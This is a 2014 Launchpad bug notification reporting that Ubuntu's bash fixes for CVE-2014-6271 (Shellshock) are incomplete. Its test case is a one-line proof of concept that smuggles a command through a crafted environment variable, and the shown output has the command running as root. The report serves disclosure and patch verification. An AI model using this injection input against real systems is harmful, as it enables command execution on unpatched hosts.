[Bug 1373781] Re: bash incomplete fix for CVE-2014-6271
Launchpad Bug Tracker
1373781 at bugs.launchpad.net
Thu Sep 25 09:44:28 UTC 2014
Status changed to 'Confirmed' because the bug affects multiple users.
** Changed in: bash (Ubuntu)
Status: New => Confirmed
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1373781
Title:
bash incomplete fix for CVE-2014-6271
Status in “bash” package in Ubuntu:
Confirmed
Bug description:
The fixes for CVE-2014-6271 do NOT work! Security vuln, but should be
public, this is known already.
Ubuntu 14.04 LTS: bash 4.3-7ubuntu1.1
Ubuntu 12.04 LTS: bash 4.2-2ubuntu2.2
Ubuntu 10.04 LTS: bash 4.1-2ubuntu3.1
Testcase:
rm -f echo && env -i X='() { (a)=>\' bash -c 'echo id'; cat echo
expected output:
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
id
actual output:
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
uid=0(root) gid=0(root) groups=0(root)
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1373781/+subscriptions
More information about the foundations-bugs
mailing list